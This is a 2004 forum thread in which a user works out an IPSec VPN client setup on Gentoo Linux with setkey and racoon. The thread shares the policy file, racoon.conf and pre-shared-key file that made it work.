LinuxQuestions.org
Review your favorite Linux distribution.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Networking
User Name
Password
Linux - Networking This forum is for any issue related to networks or networking.
Routing, network cards, OSI, etc. Anything is fair game.

Notices

Reply
 
Search this Thread
Old 12-24-2004, 10:47 AM   #1
miscreant
LQ Newbie
 
Registered: Dec 2004
Location: Oh my god! Where am I?!
Distribution: Gentoo, Kubuntu
Posts: 10

Rep: Reputation: 0
Question Setting up IPSec VPN?


Hey everyone,

OK, I've been looking around for a good tutorial on this and although the pages at ipsec-howto.org do go through it a little, it's not in enough detail for me to get what I want working.

I'm running Gentoo with kernel 2.6.8, and have compiled with the required parameters and installed the ipsec-tools. But I'm finding the man pages and tutorials for setkey and racoon confusing.

Correct me if I'm wrong, but from what I understand, setkey creates the IPSec routing entries and the racoon daemon does this dynamically for you when you try to access a site requiring IPSec?

Anyway, here's what I want to do, I'm hoping someone can offer some pointers.

My work has 2 networks that I need to connect to over the VPN. 192.168.50.xxx and 170.20.75.xxx. These both have the same gateway server we'll call a.b.c.d.

The connection is established using a pre-shared key, encrypted with 3des, and hashed with sha-1.

My computer at home is on a cable modem router (NAT) with a dynamic IP.

So what I want is for the IPSec to kick in ONLY when I try to access an address within the 2 networks above (192.168.50.xxx/172.20.75.xxx), preferably without me having to run a script or anything to start it (but it's not a big deal if I have to).

So, now some questions:
First of all, do I need to be using racoon? Or can setkey do all this at startup or via a script?
What would the structure of the setkey commands be?
If setkey can be used alone, how do I generate the keys from the pre-shared key phrase?
If I have to use racoon, how should the racoon.conf file look? I think one of the most confusing things in that file is when you need to use the gateway address (a.b.c.d) and when you have to use your own IP address (which I would prefer not to hard code since it's dynamic)

This is my first time playing around with the IPSec stuff, so go easy on me!

thanks,
miscreant
 
Old 12-24-2004, 04:40 PM   #2
miscreant
LQ Newbie
 
Registered: Dec 2004
Location: Oh my god! Where am I?!
Distribution: Gentoo, Kubuntu
Posts: 10

Original Poster
Rep: Reputation: 0
Mostly solved

OK, because I hate it when I find these questions on the internet with no answers, I will now answer my own question.

So a little more research and this is what I came up with. First of all, it turns out racoon is required. You can set up IPSec using just setkey, but then the keys never change. I hadn't realized that the "pre-shared key" is not the same as the "key" in the setkey commands.

Anyway, so the first part of this turned out to be creating the ipsec.conf file and filling it with the correct policy. Setkey was confusing because it has the SAD and SPD items. The add commands enters SADs and the spdadd command enters the SPDs. Turns out I don't need any SADs because racoon is going to generate those on the fly using my pre-shared key.

So, my ipsec.conf file looks like this:
Code:
#!/usr/sbin/setkey -f

flush;
spdflush;

spdadd 192.168.1.89 192.168.50.0/24 any
    -P out ipsec esp/tunnel/192.168.1.89-a.b.c.d/require;

spdadd 192.168.50.0/24 192.168.1.89 any
    -P in ipsec esp/tunnel/a.b.c.d-192.168.1.89/require;

spdadd 192.168.1.89 172.20.75.0/24 any
    -P out ipsec esp/tunnel/192.168.1.89-a.b.c.d/require;

spdadd 172.20.75.0/24 192.168.1.89 any
    -P in ipsec esp/tunnel/a.b.c.d-192.168.1.89/require;
This basically just tells the IPSec that it should encode/decode and tunnel anything going to or coming from 192.168.50.* or 172.20.75.*

You might notice the hardcoded ip address (192.168.1.89) from my local network. I haven't quite found a way around that, but since I can use the hardcoded IP address of my computer on my local network, not having to worry about my router's dynamic IP, it became less of a problem. If I find a solution for it, I'll put it here. I tried using 0.0.0.0, which would connect and create the key, but would not decrypt any data returned.

I then ran that file with:
Code:
setkey -f ipsec.conf
Now for the racoon.conf:

Code:
# search this file for pre_shared_key with various ID key.
path pre_shared_key "/etc/racoon/psk.txt";

# if no listen directive is specified, racoon will listen to all
# available interface addresses.

remote anonymous
{
        exchange_mode aggressive,main;
        doi ipsec_doi;
        situation identity_only;
        generate_policy on;
        proposal_check obey;

        my_identifier user_fqdn "myemail@mycompany.com";

        proposal {
                encryption_algorithm 3des;
                hash_algorithm sha1;
                authentication_method pre_shared_key;
                dh_group 2;
        }
}

sainfo anonymous
{
        encryption_algorithm 3des;
        authentication_algorithm hmac_sha1;
        compression_algorithm deflate;
}
The exchange mode must be agressive, and I think proposal_check has to be obey. generate_policy is set to on so that racoon will generate the SADs required when you attempt to connect to the networks.

My psk.txt file is simply one line:
Code:
a.b.c.d       My_Pre_Shared_Key
So now I'll set up the setkey script and racoon daemon to run at startup and all should be well.

One point to mention is that the first time I attempt to do something that requires a connection, it fails. So for example if I try:
Code:
ping 192.168.50.15
I'll get an error saying the connection is temporarily unavailable. racoon is actually generating the keys and SADs the first connection attempt. After that it seems to work fine.

Hope this helps somebody.
miscreant
 
Old 06-14-2010, 09:49 PM   #3
danmartinj
LQ Newbie
 
Registered: Oct 2009
Posts: 24

Rep: Reputation: 0
Good Tutorial

I know it's a little late but this is good information!
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
ipsec vpn Snake007uk Linux - Security 6 10-30-2010 03:43 PM
IPSEC To implement VPN UltraSoul Solaris / OpenSolaris 7 08-22-2005 02:47 AM
ipsec vpn software watts3000 Linux - Networking 0 06-09-2005 06:21 PM
Help configuring ipsec VPN twsnnva Linux - Networking 4 03-05-2005 05:09 AM
Need help with IPSec VPN securespeed Linux - Networking 3 07-19-2004 12:25 PM


All times are GMT -5. The time now is 07:01 PM.

Main Menu
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration